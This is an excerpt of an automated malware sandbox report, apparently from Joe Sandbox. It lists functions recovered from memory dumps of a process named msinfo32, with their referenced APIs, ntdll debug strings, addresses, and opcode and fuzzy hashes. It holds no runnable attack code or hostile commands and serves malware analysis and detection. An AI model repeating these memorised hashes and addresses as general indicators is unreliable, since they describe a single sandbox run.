                                            • Instruction Fuzzy Hash: 4CD0A76774000C7AA60145C4ACC1DFEB71CDB846A5F004067FB08D1040D621490206B1
                                            Function 02EC7CA0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02EC18A0,02ED7A4F,02ED510E,02EC186D), ref: 02EC7CD3
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: db33224625b92d71f954c412d8fec9401b43f61d6a1ecc24de57be6b17189514
                                            • Instruction ID: 907cce3f866ac3461a451d911a54c855f99138f38e43e2f06eb344b9c02870df
                                            • Opcode Fuzzy Hash: db33224625b92d71f954c412d8fec9401b43f61d6a1ecc24de57be6b17189514
                                            • Instruction Fuzzy Hash: 53D05E756C02053BF600A6E4DC06FA7328D9B54764F489078F90CEF2C2EA65F01149A9
                                            Function 04F02C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 74b109665001b8dcc7f068b9ffbf9b35a48beb651cde3e04313dc4ad88f7e16c
                                            • Instruction ID: 2bd4cc06cd22007a1e03846cc65b2dd14b121558ae8f26f0abca082f89b33c9b
                                            • Opcode Fuzzy Hash: 74b109665001b8dcc7f068b9ffbf9b35a48beb651cde3e04313dc4ad88f7e16c
                                            • Instruction Fuzzy Hash: 0FB09B71D415C5D6FB11F760470C71779006BD1755F16C066D2030686E4738D5D2F176

                                            Non-executed Functions

                                            Function 04F0096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04F02DF0: LdrInitializeThunk.NTDLL ref: 04F02DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00D74
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 0c161ef3365fed4fce03d464ae8bb62832ff397e094cd89adab32bdfb53b4e70
                                            • Instruction ID: 3359ca481f807e0b3f67015a7cd6c0aabc780ff9391862beb51f23025d3736b8
                                            • Opcode Fuzzy Hash: 0c161ef3365fed4fce03d464ae8bb62832ff397e094cd89adab32bdfb53b4e70
                                            • Instruction Fuzzy Hash: 0D424EB1A00715DFDB20CF24C840BAAB7F5BF44314F1485A9D959EB281EB70BA86DF61
                                            Function 04D204DE Relevance: .1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955346292.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4d20000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c824435926a43913f8f879491b9fb494cdba590b121a63757dd90538a68a7d42
                                            • Instruction ID: 3476df034d29af3afff379e03657db5c4c99ea235676eb087a2de80f5e7ce2f6
                                            • Opcode Fuzzy Hash: c824435926a43913f8f879491b9fb494cdba590b121a63757dd90538a68a7d42
                                            • Instruction Fuzzy Hash: C541F77061CB1E4FD368EF69908167AB3E2FB95308F50052DDACAC3652EB74F8468785
                                            Function 04D2DE59 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955346292.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4d20000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                            • API String ID: 0-3558027158
                                            • Opcode ID: 28a01d19e63be1141701225d718533718b3fb28eb0892be65aaeaef9d7b0772b
                                            • Instruction ID: 31b605f349f1c2582bb75b6403a0b169d430969e977272a030c1601adfe1ea72
                                            • Opcode Fuzzy Hash: 28a01d19e63be1141701225d718533718b3fb28eb0892be65aaeaef9d7b0772b
                                            • Instruction Fuzzy Hash: B0916FF04082988AC7158F54A1612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                            Function 04F02890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: eb826d2180e0e0a2c77304fbc7817e71ce7abe57b594a2ff86ade8dfaa7affe3
                                            • Instruction ID: 389976633407c9fad2a69e19e1edf829584520768fc83717babbbe3d1ba07b6c
                                            • Opcode Fuzzy Hash: eb826d2180e0e0a2c77304fbc7817e71ce7abe57b594a2ff86ade8dfaa7affe3
                                            • Instruction Fuzzy Hash: A551E8B6E00116BFDB21DF98888497EF7F8BB48205711C169E495D7681E634FE42ABE0
                                            Function 04F72410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 94c562738fe45467ebe5dfe6f1dbf3266edbb0ff22ec6851f923d2ee9d70d4cb
                                            • Instruction ID: e4dd953ca1ca06ce587219ea52ca87e24495506c04816a537616f88658cdc723
                                            • Opcode Fuzzy Hash: 94c562738fe45467ebe5dfe6f1dbf3266edbb0ff22ec6851f923d2ee9d70d4cb
                                            • Instruction Fuzzy Hash: C951F271A00645AFDB30DF9CCC9097FB7F9EF44204B0584AAE4D6D7681EA78FA418B60
                                            Function 04EF7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F34787
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F34725
                                            • Execute=1, xrefs: 04F34713
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F34655
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F34742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F346FC
                                            • ExecuteOptions, xrefs: 04F346A0
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 24463772d4d69cecc1c82143a19bb17fa7470110be485fa45b0c026f83c1d224
                                            • Instruction ID: 3d3232216eb5357c57f4df6409951d4b6acd5ea44e5adaba1cc79b39b25f26fe
                                            • Opcode Fuzzy Hash: 24463772d4d69cecc1c82143a19bb17fa7470110be485fa45b0c026f83c1d224
                                            • Instruction Fuzzy Hash: 9751D831A002196BEF14AFA4DC85FED77A8EF48309F051499E605AB1D0EB71BE468F51
                                            Function 04F0B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: dc944a783e502a6b2b641b1839b7c01082651e2c4108d4648bf0cddbcfc08b0a
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: 61818070E452499EDF288EE8C8517BEBBB6AFC5310F18C659D861A72D0D734B843EB50
                                            Function 04EEF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 04F3031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F302BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F302E7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 12653ea141d91f29fbd47a549dca6e02935b7733b80fc5828f81689f4202ffe5
                                            • Instruction ID: 1efe7533959fb57bde03eef9a08734bf9b749586f97853150d68923428a56f0d
                                            • Opcode Fuzzy Hash: 12653ea141d91f29fbd47a549dca6e02935b7733b80fc5828f81689f4202ffe5
                                            • Instruction Fuzzy Hash: 63E1AE30604741EFE724CF29C884B6AB7E0FF88318F144A59E5958B2D1EB74F946CB92
                                            Function 04EFBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Resource at %p, xrefs: 04F37B8E
                                            • RTL: Re-Waiting, xrefs: 04F37BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F37B7F
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: a136c1a39b5c979e8950dda7d075ddf4163600f19bc342a58acfd3b6b9f21d03
                                            • Instruction ID: 2f33da96d9f72432818af82e3fc662562d186148187def5c58c388678e18c5f4
                                            • Opcode Fuzzy Hash: a136c1a39b5c979e8950dda7d075ddf4163600f19bc342a58acfd3b6b9f21d03
                                            • Instruction Fuzzy Hash: 2941D2367047029FD724DE25CC40B6AB7E5EF88715F101A1DEA5ADB680EB31F9068B91
                                            Function 04EFB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F3728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 04F372A3
                                            • RTL: Re-Waiting, xrefs: 04F372C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F37294
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: db7f81d15762d0f0408f1058eb07f01d1a59a7f7866f65a20b9c6dbbdc26aed1
                                            • Instruction ID: 1aef14bc4b8a3d0ab206f0539d83c1408af9992cc36ca2e4cee789df083e2af0
                                            • Opcode Fuzzy Hash: db7f81d15762d0f0408f1058eb07f01d1a59a7f7866f65a20b9c6dbbdc26aed1
                                            • Instruction Fuzzy Hash: 7441D271B00202AFD720EE25CC41F66B7E5FB84715F104619FA55EB680EB21F8579BE1
                                            Function 04F72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: b037e360b5f0774401391515085947984850b4ff0be79010d29ec3c808ec93d9
                                            • Instruction ID: 7315361c0490cbfd6e10d69eabd57a650a82245dc322b19cd836f661e265adf4
                                            • Opcode Fuzzy Hash: b037e360b5f0774401391515085947984850b4ff0be79010d29ec3c808ec93d9
                                            • Instruction Fuzzy Hash: 1E318172A002199FDB60DF29DC40BEFB7B8EB44714F454596E849E3240EB34BA468FA1
                                            Function 04D20118 Relevance: 6.3, Strings: 5, Instructions: 42COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955346292.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4d20000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XWp$XWp$XWp$XWp$XWp
                                            • API String ID: 0-2868150270
                                            • Opcode ID: e68e3dcab11b0c72b9d929d8dd4058fb9349e460efec1846e0ec09c16a406ae4
                                            • Instruction ID: c9b9228c1aa78dde1ad2160a9279e35a9f88232c59d046df0c571e08befcca28
                                            • Opcode Fuzzy Hash: e68e3dcab11b0c72b9d929d8dd4058fb9349e460efec1846e0ec09c16a406ae4
                                            • Instruction Fuzzy Hash: 6F017870C1070D8BAF88EFA588061EEBEB0FB14301F60812AC41AF6264DBF44A419F96
                                            Function 04F07D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: 740d48f62989b7d754c22edabc16b368eb805a145cdeca8b338e5acb9c881c19
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 7791B471F002169BDF24EE69C8806BEB7E5AFC4361F54C59AE855E72C0E730B942E760
                                            Function 04EC9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 63911289c840f1ef91d14e93ad20a3a0d513f27da70a96f62489c9cd56d11572
                                            • Instruction ID: 62e412d7673a7a82c098f8da3459aabebcfbec60e2767e02e4ded24ab0640713
                                            • Opcode Fuzzy Hash: 63911289c840f1ef91d14e93ad20a3a0d513f27da70a96f62489c9cd56d11572
                                            • Instruction Fuzzy Hash: F9811CB2D002699BDB35DF54CD45BEEB7B4AB08714F0141EAE919B7240E770AE85CFA0